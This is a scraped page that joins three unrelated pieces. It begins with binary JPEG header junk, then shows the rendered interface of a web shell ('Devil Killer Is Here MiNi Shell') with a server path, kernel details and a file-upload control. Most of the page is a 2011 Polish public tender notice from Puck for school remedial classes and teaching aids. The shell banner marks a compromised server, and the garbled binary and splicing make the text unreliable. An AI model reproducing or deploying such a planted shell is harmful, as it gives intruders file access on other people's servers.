JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111026/353684-N-2011.html

<p class="kh_header"><b>Puck: Świadczenie usługi edukacyjnej oraz doposażenie bazy dydaktycznej szkoły w projekcie o tytule Indywidualizacja nauczania i wychowania uczniów klas I-III szkoły podstawowej w Pucku</b><br>
<b>Numer ogłoszenia: 353684 - 2011; data zamieszczenia: 26.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Puck , ul. 1 Maja 13, 84-100 Puck, woj. pomorskie, tel. 58 6730500, 6730534, faks 58 6730533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.puck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej oraz doposażenie bazy dydaktycznej szkoły w projekcie o tytule Indywidualizacja nauczania i wychowania uczniów klas I-III szkoły podstawowej w Pucku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przeprowadzanie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I - III. 
Celem głównym usługi jest wyrównywanie szans edukacyjnych poprzez indywidualizację procesu kształcenia dzieci klas I - III w publicznej placówce oświatowej z terenu Gminy Miasta Puck., tj.: Szkoła Podstawowa w Pucku.
Cele szczegółowe projektu to
-Zmniejszenie dysproporcji edukacyjnych i rozwojowych uczniów i uczennic szkół miasta Puck poprzez udział w dodatkowych zajęciach wyrównawczych w terminie od dnia podpisania umowy do 30.06.2013r,
-Zwiększenie dostępności i wzmocnienie logopedyczne uczniów i uczennic szkół miasta Puck poprzez udział w dodatkowych zajęciach logopedycznych w terminie od dnia podpisania umowy do 30.06.2013r,
-Rozwój zainteresowań i uzdolnień uczniów i uczennic szkoły podstawowej z miasta Puck ze szczegółowym wzmocnieniem kompetencji matematyczno- przyrodniczych poprzez zwiększenie liczby zajęć dodatkowych w okresie od dnia podpisania umowy do 30.06.2013r.
-W zajęciach z beneficjentami  poruszona zostanie kwestia  zasady równością szans kobiet i mężczyzn w życiu społecznym. Bezpośrednim realizatorem usługi (nauczycielem) z ramienia Wykonawcy (doświadczonej firmy szkoleniowej) będzie osoba, która posiada wykształcenie kierunkowe oraz praktykę.
2.Szczegółowy opis przedmiotu zamówienia - zespół nauczycieli, zatrudnionych przez wykonawcę, stworzy program indywidualizacji (na podstawie właściwych założeń projektowych) obejmujący tematykę następujących edukacyjnych zajęć dodatkowych:

a.Zajęcia dla dzieci ze specyficznymi trudnościami w matematyce :
Ilość godzin - 480h łącznie dla wszystkich grup,
Ilość grup - 5.
SP w Pucku 5 gr. ok. 9-osobowa - 96 h w każdej grupie,
Termin realizacji do czerwca 2013r. (z wyłączeniem okresu wakacyjnego)

b.Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy :
Ilość godzin - 600h łącznie dla wszystkich grup,
Ilość grup - 6.
SP w Pucku 6 gr. ok. 3-4-osobowa - 100 h w każdej grupie,
Termin realizacji do czerwca 2013r. (z wyłączeniem okresu wakacyjnego)

c.Zajęcia dla dzieci z gimnastyki korekcyjnej :
Ilość godzin - 480h łącznie dla wszystkich grup,
Ilość grup - 4.
SP w Pucku 4 gr. ok. 7-osobowa - 120 h w każdej grupie,
Termin realizacji do czerwca 2013r. (z wyłączeniem okresu wakacyjnego),

d.Zajęcia dla dzieci rozwijające zdolności matematyczno- przyrodnicze:
Ilość godzin - 240h łącznie dla wszystkich grup,
Ilość grup - 2.
SP w Pucku 2 gr. ok. 7-8-osobowa - 120 h w każdej grupie,
Termin realizacji do czerwca 2013r. (z wyłączeniem okresu wakacyjnego)
Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia poinformuje Zamawiającego (na piśmie lub osobiście - spotkanie plenarne) o autorskim programie i koncepcji przeprowadzenia zajęć. 
Zaleca się, aby oferent dokonał wizji lokalnej na terenie objętym zakresem rzeczowym zadania oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty. 
Za wypadki i szkody powstałe podczas usługi odpowiada wykonawca. Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie wykonawca.
Wykonawca dostarczy następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia:
1.Doposażenie bazy dydaktycznej w SP Pucku :
-laptop (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) lub równoważny- 3 szt
-tablica interaktywna (przekątna tablicy 52, technologia elektromagnetyczna- dualna, obsługa poprzez pisak, oprogramowanie, 2 elektroniczne pisaki, 1 zestaw do montażu naściennego, 1 płyta instalacyjna ze sterownikami) lub równoważna- 1szt,
-lustro logopedyczne o wym. 38x 110cm- 4szt,
-lornetka szkolna (powiększenie sześciokrotne, gumowe osłonki, pokrętło do ustawiania ostrości, soczewka o śr. 35 mm)- 15szt,
-pomoc dydaktyczna w postaci kompletu do treningu matematycznego (zestaw art , pozwalający ćwiczyć umiejętności matematyczne takie jak dodawanie, odejmowanie, mnożenie i dzielenie. Karty z tworzywa, drukowane dwustronnie: z jednej strony zadanie, a na rewersie odpowiedź. Zestaw składający się z elementów: Trening matematyczny - dodawanie do 25, Trening matematyczny - dodawanie i odejmowanie do 10, Trening matematyczny - dodawanie i odejmowanie do 150, Trening matematyczny - mnożenie do 100, Trening matematyczny - dzielenie do 100) lub równoważne- 15szt,
-program multimedialny Echokorektor (program do terapii jąkania, istotą progarmu jest mówienie w sposób zsynchronizowany z własnym echem opóźnionym o 0,1 - 0,3 sek. - dzięki czemu niepłynność artykulacji nie pojawia się. Pomoc edukacyjna, przy której wypowiadane są do mikrofonu słowa, zdania i zwroty ćwiczeniowa. Komputer, po odpowiednim przetworzeniu dźwięku z mikrofonu, wysyła go do słuchawek ćwiczącego. Osoba poddawana terapii słyszy wówczas w słuchawkach własny głos opóźniony o zadany interwał czasowy.) lub równoważny- 1szt,
-program multimedialny do terapii mowy bezdźwięcznej Mowa bezdźwięczna (program zawierający ćwiczenia słuchowe wspierające rozpoznawanie, różnicowanie wysokości i natężenia dźwięków, ćwiczenia wspomagające różnicowanie głosek dźwięcznych i bezdźwięcznych, szereg ćwiczeń na wszystkie etapy terapii udźwięcznianej głoski) lub równoważny- 1szt,
-Pomoc dydaktyczna Multimedialny pakiet logopedyczny cz. 4 (głoski: j, l, r) (pakiet logopedyczny dla dzieci z wadami wymowy w wieku 4- 9 lat. Zestaw zawierający ćwiczenia wspomagające terapię logopedyczną, ćwiczące wymowę określonych głosek j,l, r. Zestaw składający się z programu komputerowego, książki, zeszyty ćwiczeń, kartonowe wkładki- program komputerowy zawierający 5 lub 6 multimedialnych gier, książki przedstawiające opis rozwoju mowy dziecka i czynniki wpływające na nieprawidłową artykulację opracowanych głosek, zeszyty proponujące ćwiczenia grupowe lub indywidualne, a także zawierające kartonowe wkładki z obrazami i wyrazami) lub równoważny- 1szt,
-Gra logopedyczna Drabina cz. I (plansza drabina- 240 kartek z wyrazami ćwicząca głoski: s,z,c,dz,sz,cz,dż,ś,ź,ć,dź,ż) lub równoważna- 1szt,
-Gra logopedyczna Drabina cz. II (plansza drabina- 240 kartek z wyrazami ćwicząca  głoski: p-b, t-k, k-g, f-w, s-z, c-dz, cz-dż, sz-ż, ś-ź) lub równoważna- 1szt,
-Logopedyczna gra oddechowa Turbinka logopedyczna (gra edukacyjna pozwalająca wyćwiczyć kontrolowanie oddechu; gra składająca się z 2 obręczy z obrazkami, o różnym stopniu trudności, 2 płóciennych woreczków, 20 gumowych pierścieni) lub równoważna- 1szt,
-Plansze tematyczne Opowiadamy z wyobraźnią (Plansze tematyczne Pory roku,  pomoc dydaktyczna umożliwiająca rozwijanie słownictwa oraz pobudzanie wyobraźni dziecka. Plansze opisujące miejsca podczas różnych pór roku: miasteczko, plac ratuszowy, targowisko, wioska, za miastem, gospodarstwo rolne, port rybacki, plaża, kamping, góry, sporty zimowe. Pomoc edukacyjna wzbogacająca słownictwo związane z porami roku, rozwijająca umiejętności opowiadania, rozbudzanie wyobraźni u dzieci, kształtowanie podstawowych kompetencji społecznych, umiejętność spostrzegania. Zestaw 12 kolorowych plansz o wymiarach 40x52 cm, 12 plansz konturowych czarno białych o wymiarach 40x53 cm, 12 kart do kopiowania i kolorowania o wymiarach 21x30 cm) lub równoważna- 1szt
-Pomoc logopedyczna Dialo- sytuacje codzienne(gra pozwalająca utrwalić słownictwo bierne i rozwijanie słownictwa aktywnego. Gra zawierająca element samokontroli- otoczka otworu w planszy. Gra dotycząca problematyki: dookoła domu, w sklepie, na ulicy, na gospodarstwie, w szpitalu. Zestaw zawierający 6 dwustronnych plansz o wymiarach 40x32cm, podstawka na plansze o dł.32cm, 12 gwoździków o dł.5cm, wszystkie elementy wykonane z trwałego tworzywa) lub równoważna- 1szt,
-Woreczki z grochem o 1 wymiarach 10 x 15 cm do ćwiczeń stóp, ćwiczeń równoważnych, ćwiczeń antygrawitacyjnych- 49szt,
-Zestaw 4 szt ringo (pomoce dydaktyczne do trzymania, ciągnięcia, toczenia, rzucania i zabaw sztafetowych. Nadmuchiwane, profilowane koła z wentylem do pompowania. Wymiary: grubość ok. 3 cm, O zewn. 18 cm, O wewn.12 cm, waga 180 g.) 2szt,
-Zestaw 24szt piłeczek wykonanych z miękkiej pianki, piłeczki o średnicy 5cm- 2szt,
-Zestaw dydaktyczny Aktywne ringo (zestaw 6 elastycznych, kolorowych kółeczek o średnicy 16,4 cm) lub równoważna- 2szt,
-Pomoc dydaktyczna Półkule chodziki (zestaw 3 par kolorowych półkul ze sznurkami wypełnionych piaskiem) lub równoważne- 2szt,
-Deska balansująca (Średnica: 32 cm. Wysokość: 9,5 cm.) lub równoważna- 4szt,
-Plansza na kółkach Pełzak (drewniana plansza wym. 61 x 40 cm do ćwiczeń mięsni obręczy barkowej) lub równoważna- 4szt,
-Piłka piankowa- 6szt,
-Zestaw 4 skakanek z trwałego tworzywa (Dł. skakanki 2 m)- 3szt,
-Trenażer do ćwiczeń mięśni brzucha o dł. ok. 103cm- 6szt,
-Pomoc dydaktyczna Przybornik małego przyrodnika (zestaw 6 małych pojemniczków z przykrywką ze szkłem powiększającym. Materiał wykonania- przezroczysty plastik pozwalający na długofalową obserwację procesów przyrodniczych) lub równoważny- 15szt,
-Pojemnik z lupą (przezroczysty, plastikowy pojemnik o śr. 6,5 cm i wymiarach: 4,5 x 4,5 cm. Na wieczku znajduje się lupa (szkło powiększające o śr. 4,5 cm, a nad nim drugie szkło wyjmowane o śr. 3,5 cm; każde z nich daje x 2 powiększenie)- 5szt,
-Uniwersalne płytki Petriego ( 3 trójdzielne płytki z pokrywką, śr. 9 cm,  wys. 1,5 cm)- 15szt,
-Lupka ręczna (lekka lupa o średnicy 100 mm o powiększeniu x2, wykonanie z trwałego tworzywa. W lupie dwa mniejsze oczka o średnicy 20 mm, z możliwością powiększenia X3 i x4. Antypoślizgowa rączka)- 5szt,
-Pomoc dydaktyczna Koło do odmierzania odległości (przyrząd do odmierzania długich odległości. Koło zaopatrzone w gumową oponę. Regulowany uchwyt. Koło wydaję charakterystyczne kliknięcie po przekroczeniu każdego metra, stąd też zliczenie kliknięć daje wynik pomiaru. Wbudowany licznik dający pomiar równoległy.) lub równoważne- 1szt,
-Lupka powiększająca (powiększenie: 5x., średnica soczewki: O60mm., wykonanie: metal i plastik)- 5szt,
-Pomoc dydaktyczna w postaci elektronicznej stacji pogody (radiowo kontrolowany sygnał czasu, wyświetlacz LCD z 12 lub 24 godzinnym zegarem , wskazanie daty i godziny, wskazanie temperatury wewnętrznej i zewnętrznej w °Celsjusza lub Fahrenheita (oF), możliwość przyjmowania sygnałów od trzech przekaźników, częstotliwość transmisji danych 433 MHz, maksymalny zasięg przesyłu - 30m (dotyczy otwartej przestrzeni), zakres pomiarowy temperatur z rejestracją co 45 sekund: wewnętrznej: -10°C do +50°C z dokładnością co 0,1°C oraz zewnętrznej: -20oC do +50oC z dokładnością co 0,1oC, zasilanie: 2 x 1,5V, bateria AA, LR6)- 1szt,
-Zestaw pomocy edukacyjnych Barometr- higrometr- termometr (zestaw umożliwiający odczyty: temperatury, wilgotności powietrza i ciśnienia. Zestaw 3 przenośnych przyrządów meteorologicznych: termometr, barometr i higrometr; średnica przyrządów 7,6 cm) lub równoważne- 1szt,
-Mikroskop typu Senior (powiększenie 100x, 200x oraz 300x, 2 opcje podświetlenia, 6 przygotowanych przeźroczy, metalowa podstawa zapewniająca stabilność) lub równowazny- 15szt
-Kompas (z dużą i czułą tarczą magnetyczną- zamiast igły, obudowa z mocnego plastiku, wielkość: 5,5cm.)- 15szt,
-Zestaw 6 probówek z tworzywa (małe próbówki z zatyczkami na praktycznym stojaku, probówki o wym.13,5 x 1,5 cm, stojak 16 x 5 x 5 cm)- 2szt.

Na zrealizowane dostawy okres gwarancji zgodny z gwarancją producenta.
Zamawiający zastrzega sprawdzenie kompletności dostawy pomocy dydaktycznych w terminie 30 dni od dnia zawarcia umowy.
Wykonawca ponosi pełną odpowiedzialność materialną za powierzone pomoce dydaktyczne, które zostaną zakupione w ramach projektu. Przejęcie przez Zamawiającego pomocy dydaktycznych nastąpi na podstawie protokółu zdawczo-odbiorczego w terminie 7 dni przed zakończeniem projektu. 
Zmiana którejkolwiek z osób wskazanych w ofercie w trakcie realizacji przedmiotu niniejszej umowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki postawione w tym zakresie w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1, 39.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować wykonanie minimum 2 usług o charakterze podobnym rodzajowo do przedmiotu zamówienia o wartości minimum 100.000,00 zł. brutto. Zamawiający dokona oceny  na podstawie wykazu usług wraz  z dokumentami potwierdzającymi, że usługi zostały wykonane należycie.
 Ocena spełnienia warunku przeprowadzona zostanie na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia - bezpośrednim realizatorem usługi z ramienia Wykonawcy powinny być osoby, które posiadają kwalifikacje dla odpowiedniej części zamówienia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (dz. U. Nr 50 poz.400) w sprawie szczegółowych kwalifikacji  wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli. Potencjalni Wykonawcy z innych państw członkowskich Unii Europejskiej mogą spełnić ten warunek posiadając równoważne uprawnienia uzyskane            w swoich krajach pochodzenia. Zamawiający dokona oceny na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie dysponowania tymi osobami.
Ocena spełnienia warunku przeprowadzona zostanie na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Kwalifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Niedopuszczalna jest zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy za wyjątkiem poniższych przypadków:
1) zmiana wysokości wynagrodzenia Wykonawcy na skutek:
a) ustawowej zmiany stawki podatku VAT,
b)Zamawiający dopuszcza możliwość zmiany terminu obowiązywania umowy w wypadku opóźnień związanych z realizacją założeń projektowych, wynikających z przyczyn leżących po stronie Zamawiającego lub Instytucji Pośredniczącej.
Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.miasto.puck.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Puck, ul. 1 Maja 13, 84-100 Puck.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2011 godzina 09:00, miejsce: Urząd Miasta Puck, ul. 1 Maja 13, 84-100 Puck, Sekretariat - pokój 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, 
9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
